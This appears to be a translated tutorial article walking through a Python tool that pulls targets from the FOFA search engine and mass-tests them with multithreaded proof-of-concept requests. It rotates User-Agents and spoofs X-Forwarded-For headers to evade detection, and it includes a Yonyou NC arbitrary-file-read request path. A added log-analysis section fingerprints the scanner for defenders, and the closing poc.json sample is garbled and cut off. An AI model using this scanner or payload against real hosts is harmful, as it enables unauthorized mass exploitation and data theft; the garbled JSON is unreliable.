2025-02-27 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)06/01 Report--
This article introduces how to write a Python script that batch-verifies targets against POC (proof of concept) checks. The editor walks through the implementation with an actual case; the approach is simple, fast and practical, and the aim is that "how to write a Python script for batch POC vulnerability verification" helps you solve this problem.
Requirements analysis
1. The POC format should be as simple as possible.
2. Multithreading.
3. Integrate FOFA to obtain targets.
4. Random request headers.
Implementation
The script is divided into three modules: obtaining the POC and the targets, multithreaded batch request verification, and output of the results. Batch request verification itself has three parts: building the threads, modifying the request parameters, and sending the request.
Main function
The main function has three parts: getting the POC and the targets, multithreading (filling the targets into a queue, creating the threads and starting them), and outputting the result.
The specific implementation is as follows:
```python
def main():
    # respond to the Ctrl+C stop signal
    signal.signal(signal.SIGINT, quit)
    signal.signal(signal.SIGTERM, quit)
    showpocs()
    # get targets
    targetList = getTarget()
    # multithreaded batch request verification
    thread(targetList)
    # output result
    putTarget(List)
```
Get target
Three target sources are supported: a single target, multiple targets read from a file, and targets fetched from the FOFA API using FOFA query syntax.
The function getTarget is divided into two parts.
The first part fetches targets from FOFA according to the -f FOFA query syntax (without a POC) and saves them to a file. The default number is 30.
The second part collects the targets to verify from -u url, -i file or -f num (a number, default 10). The two branches are distinguished by whether the -p poc parameter is passed, and the function finally returns a targetList list.
The specific implementation is as follows:
```python
def getTarget():
    targetList = []
    count = 0
    if result.poc == None:
        if result.outfile != None:
            # FOFA: read targets by query string and save them to a file
            if result.fofa != None:
                qbase = result.fofa
                qbase64 = str(base64.b64encode(qbase.encode("utf-8")), "utf-8")
                print("FOFA search: " + qbase)
                fofa_url = ("https://fofa.so/api/v1/search/all?email=" + email + "&key=" + key
                            + "&qbase64=" + qbase64 + "&fields=title,host,ip,port,city&size=30")
                try:
                    res = requests.get(fofa_url)
                    results = json.loads(res.text)
                    filepath = result.outfile
                    with open(filepath, 'w') as targets:
                        for i in results['results']:
                            targets.write(i[1] + '\n')
                            print(i[1])
                            count += 1
                    print("search results have " + str(count) + " saved in " + filepath + "!")
                except Exception as e:
                    print(e)
                sys.exit()
    else:
        if result.url != None or result.file != None or result.fofa != None:
            # single target
            if result.url != None:
                targetList.append(result.url)
            # file: read targets line by line
            if result.file != None:
                try:
                    filepath = result.file
                    with open(filepath, 'r') as targets:
                        for target in targets.readlines():
                            targetList.append(target.strip())
                except Exception as e:
                    print(e)
            # FOFA: read targets using the query stored in the POC
            if result.fofa != None:
                qbase = ""
                pocName = result.poc
                with open('poc.json', encoding='UTF-8') as f:
                    data = json.load(f)
                for poc in data:
                    if pocName == poc:
                        qbase = data[poc]['fofa']
                qbase64 = str(base64.b64encode(qbase.encode("utf-8")), "utf-8")
                try:
                    fofa_url = ("https://fofa.so/api/v1/search/all?email=" + email + "&key=" + key
                                + "&qbase64=" + qbase64 + "&fields=title,host,ip,port,city&size="
                                + str(result.fofa))
                    res = requests.get(fofa_url)
                    results = json.loads(res.text)
                    print("FOFA search: " + qbase)
                    print("search results: " + str(result.fofa))
                    for i in results['results']:
                        targetList.append(i[1])
                    # print(targetList)
                except Exception as e:
                    print(e)
            return targetList
        else:
            sys.exit("wrong! No target given!")
```
Batch request verification
Define a function thread that encapsulates the code related to the multithreaded requests. It takes the list of acquired targets, targetList, as its parameter.
The specific implementation is as follows:
```python
def thread(targetList):
    # get poc
    poc = poc_load()
    # fill the queue
    queueLock.acquire()
    for target in targetList:
        targetQueue.put(target)
    queueLock.release()
    # create threads
    threadList = []
    threadNum = result.threadNum
    for i in range(0, threadNum):
        t = reqThread(targetQueue, poc)
        t.daemon = True
        threadList.append(t)
    for i in threadList:
        i.start()
    # wait for all threads to finish
    for t in threadList:
        t.join()
```
Load POC
Request verification must use the -p pocName parameter to specify the POC to use; all POCs are stored in the poc.json file.
The specific implementation is as follows:
```python
# load poc
def poc_load():
    if result.poc != None:
        poc = result.poc
        isPoc = False  # whether the POC exists
        # read the json file
        with open('poc.json', encoding='UTF-8') as f:
            data = json.load(f)
        for key in data:
            if poc == key:
                isPoc = True
        if isPoc == False:
            print("POC does not exist!")
            sys.exit("Please view the poc list through --show!")
        else:
            return data[poc]
    else:
        pass
```
Multithreaded class
Define the thread class reqThread, which takes two parameters, the queue and the POC, and encapsulates the request method req.
The specific implementation is as follows:
```python
class reqThread(threading.Thread):
    def __init__(self, q, poc):
        threading.Thread.__init__(self)
        self.q = q
        self.poc = poc

    def run(self):
        while not self.q.empty():
            queueLock.acquire()
            target = self.q.get()
            queueLock.release()
            # one failed request (timeout, connection error) must not stop the
            # worker, so the exception is caught per target, not around the loop
            try:
                if self.req(target):
                    print(target + " is vuln!")
                    List.append(target)
            except Exception as e:
                pass

    def req(self, url):
        poc = self.poc
        payload = urlParse(url) + poc['request']['url']
        res = requests.request(method=poc['request']['method'], url=payload,
                               headers=randomHeaders(poc), proxies=getProxy(),
                               data=poc['request']['data'], verify=False, timeout=5)
        if res.status_code == 200 and poc['request']['confirm'] in res.text:
            return True
        else:
            return False
```
Inside req, three helper functions modify the request: urlParse, getProxy and randomHeaders.
urlParse
Text processing is performed on the acquired target.
```python
# process url: make sure the target carries a scheme
def urlParse(url):
    if "https://" not in url:
        if "http://" in url:
            url = url
        else:
            url = "http://" + url
    return url
```
getProxy
Specify the request proxy. The listing on the page repeats urlParse at this point; the function below is an assumed reconstruction built from the --proxy option defined in the argument parser (a requests proxies dict, or None when no proxy is given).
```python
# proxy (assumed reconstruction from the --proxy argument)
def getProxy():
    if result.proxy != None:
        return {"http": result.proxy, "https": result.proxy}
    return None
```
randomHeaders
Add a random User-Agent, Referer and X-Forwarded-For (XFF), plus any other request headers given in the POC.
```python
def randomHeaders(poc):
    headers = {}
    uaList = [
        'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.100 Safari/537.36',
        'Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X; zh-CN) AppleWebKit/537.51.1 (KHTML, like Gecko) Mobile/17D50 UCBrowser/12.8.2.1268 Mobile AliApp(TUnionSDK/0.1.20.3)',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.116 Safari/537.36',
        'Mozilla/5.0 (Linux; Android 8.1.0; OPPO R11t Build/OPM1.171019.011; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/76.0.3809.89 Mobile Safari/537.36 T7/11.19 SP-engine/2.15.0 baiduboxapp/11.19.5.10 (Baidu; P1 8.1.0)',
        'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36',
        'Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 SP-engine/2.14.0 main%2F1.0 baiduboxapp/11.18.0.16 (Baidu; P2 13.3.1) NABar/0.0',
        'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134',
        'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36',
        'Mozilla/5.0 (iPhone; CPU iPhone OS 12_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 MicroMessenger/7.0.10(0x17000a21) NetType/4G Language/zh_CN',
        'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36',
        'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36',
        'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36',
        'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.108 Safari/537.36',
        'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36',
        'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.106 Safari/537.36',
    ]
    refList = ["www.baidu.com"]
    xffList = ['127.0.0.1', '51.77.144.148', '80.93.212.46', '109.123.115.10', '187.44.229.50',
               '190.14.232.58', '5.166.57.222', '36.94.142.165', '52.149.152.236', '68.15.147.8',
               '188.166.215.141', '190.211.82.174', '101.51.139.179']
    # a header that is present but empty in the POC is filled with a random value
    if 'User-Agent' in poc['request']['headers']:
        if poc['request']['headers']['User-Agent'].strip() != '':
            headers['User-Agent'] = poc['request']['headers']['User-Agent']
        else:
            headers['User-Agent'] = random.choice(uaList)
    if 'referer' in poc['request']['headers']:
        if poc['request']['headers']['referer'].strip() != '':
            headers['referer'] = poc['request']['headers']['referer']
        else:
            headers['referer'] = random.choice(refList)
    if 'X-Forwarded-For' in poc['request']['headers']:
        # the original tested the User-Agent value here; the XFF value is what must be checked
        if poc['request']['headers']['X-Forwarded-For'].strip() != '':
            headers['X-Forwarded-For'] = poc['request']['headers']['X-Forwarded-For']
        else:
            headers['X-Forwarded-For'] = random.choice(xffList)
    # copy every other header from the POC unchanged
    for key in poc['request']['headers']:
        if key != "referer" and key != "User-Agent" and key != "X-Forwarded-For":
            headers[key] = poc['request']['headers'][key]
    return headers
```
Output result
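Seen from the defending side, the bare www.baidu.com referer, the fixed X-Forwarded-For list and a User-Agent that changes on every request from the same source are a usable fingerprint of this scanner. The example below is added here and is not part of the original script; it assumes a constructed log format (combined log with a trailing quoted X-Forwarded-For field) and runs over constructed sample lines.

```python
import re
from collections import defaultdict

# X-Forwarded-For values hard-coded in randomHeaders above; their reuse is a signature.
FIXED_XFF = {'127.0.0.1', '51.77.144.148', '80.93.212.46', '109.123.115.10',
             '187.44.229.50', '190.14.232.58', '5.166.57.222', '36.94.142.165',
             '52.149.152.236', '68.15.147.8', '188.166.215.141', '190.211.82.174',
             '101.51.139.179'}
FIXED_REFERER = 'www.baidu.com'   # sent as a bare host name, not a URL

# Assumed log format: combined log plus a quoted X-Forwarded-For field at the end.
LOG_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
                    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)" "(?P<xff>[^"]*)"$')

def parse_line(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def analyse(lines, ua_threshold=3):
    """Return {source_ip: [reasons]} for sources whose requests look like this scanner."""
    reasons = defaultdict(set)
    uas = defaultdict(set)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if rec['xff'] in FIXED_XFF:
            reasons[rec['src']].add('xff-from-fixed-list')
        if rec['ref'] == FIXED_REFERER:
            reasons[rec['src']].add('bare-baidu-referer')
        uas[rec['src']].add(rec['ua'])
    # a single source presenting many different User-Agents is the random UA rotation
    for src, seen in uas.items():
        if len(seen) >= ua_threshold:
            reasons[src].add('rotating-user-agent')
    return {src: sorted(r) for src, r in reasons.items()}

# Constructed sample lines (not real traffic): 203.0.113.5 behaves like the scanner.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jun/2024:10:00:01 +0000] "GET /NCFindWeb?service=IPreAlertConfigService&filename=index.jsp HTTP/1.1" 200 512 "www.baidu.com" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36" "51.77.144.148"',
    '203.0.113.5 - - [01/Jun/2024:10:00:02 +0000] "GET /NCFindWeb?service=IPreAlertConfigService&filename=index.jsp HTTP/1.1" 404 200 "www.baidu.com" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36" "68.15.147.8"',
    '203.0.113.5 - - [01/Jun/2024:10:00:03 +0000] "GET /NCFindWeb?service=IPreAlertConfigService&filename=index.jsp HTTP/1.1" 404 200 "www.baidu.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 12_4 like Mac OS X)" "190.211.82.174"',
    '198.51.100.9 - - [01/Jun/2024:10:00:04 +0000] "GET /index.html HTTP/1.1" 200 1024 "https://example.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/120.0" "-"',
]

if __name__ == "__main__":
    for src, why in analyse(SAMPLE_LOG).items():
        print(src, why)
```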
Define the global variable List, which stores the targets to be output, and define the output method putTarget.
The specific implementation is as follows:
```python
List = []

# output
def putTarget(resultList):
    if result.file != None or result.fofa != None:
        if len(resultList) != 0:
            if result.outfile != None:
                filepath = result.outfile
                with open(filepath, 'w') as targets:
                    for target in resultList:
                        targets.write(target + '\n')
                print("verification result has " + str(len(resultList)) + " saved in " + filepath + "!")
        else:
            print("No vulnerability targets found!")
    else:
        pass
```
Other global variables
```python
# imports needed by the whole script (place them at the top of the file)
import base64
import json
import queue
import random
import signal
import sys
import threading
from argparse import ArgumentParser

import requests
from urllib3.exceptions import InsecureRequestWarning

# ignore https certificate warnings (verify=False is used in req)
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
# queue
targetQueue = queue.Queue()
# lock
queueLock = threading.Lock()
# result
List = []
# FOFA account (fill in your own e-mail and API key)
email = ""
key = ""
```
Command line read parameter
```python
arg = ArgumentParser(description='POC_Verify')
arg.add_argument('-u', '--url', dest='url', help='Target URL', type=str)
arg.add_argument('-i', '--file', dest='file', help='Scan multiple targets given in a textual file', type=str)
arg.add_argument('-f', '--fofa', dest='fofa',
                 help='fofa query Nums/String. Example: with -p poc use -f 10, else -f "abc"; default=30',
                 default=10)
arg.add_argument('-p', '--poc', dest='poc', help='Load POC from poc.json')
arg.add_argument('--proxy', dest='proxy',
                 help='Use a proxy to connect to the target URL. Example: --proxy http://127.0.0.1:8080', type=str)
arg.add_argument('-t', '--thread', dest='threadNum', help='the thread count, default=10', type=int, default=10)
arg.add_argument('--show', dest='show', help='show all pocs', nargs='?', const='all', type=str)
arg.add_argument('-o', '--outfile', dest='outfile', help='the file to save the result', default='result.txt', type=str)
result = arg.parse_args()
```
POC details display
```python
# display poc
def showpocs():
    isPoc = False
    if result.show != None:
        # read json file
        with open('poc.json', encoding='UTF-8') as f:
            data = json.load(f)
        if result.show == "all":
            print("pocname".ljust(20), "description".ljust(20))
            print("-")
            for key in data:
                print(key.ljust(20), data[key]['name'].ljust(20))
        else:
            if result.show in data:
                print("pocname".ljust(20), "description".ljust(20))
                print("-")
                print(result.show.ljust(20), data[result.show]['name'].ljust(20))
        sys.exit()
    else:
        pass
```
Ctrl+C end thread
```python
# stop program
def quit(signum, frame):
    print('You chose to stop me.')
    sys.exit()
```
poc.json file
A POC is essentially one HTTP request. To keep it simple, only five fields are defined: a name, the FOFA query linked to it, the request headers, the request content, and the response content that confirms the vulnerability exists.
{"pocname": {"name": "vulnerability description", "fofa": "fofa search string" Special symbols need to be escaped "," request ": {" method ":", "url": "," headers ": {" referer ":", "User-Agent": "," X-Forwarded-For ":" "Content-Type": "}," data ":", "confirm": "echo string"}}, "yonyounc": {"name": "any file read by NC", "fofa": "app=\" user-UFIDA-NC\ "" "request": {"method": "get", "url": "/ NCFindWeb?service=IPreAlertConfigService&filename=index.jsp", "headers": {"referer": "," User-Agent ":", "X-Forwarded-For": ""} "data": "," confirm ":"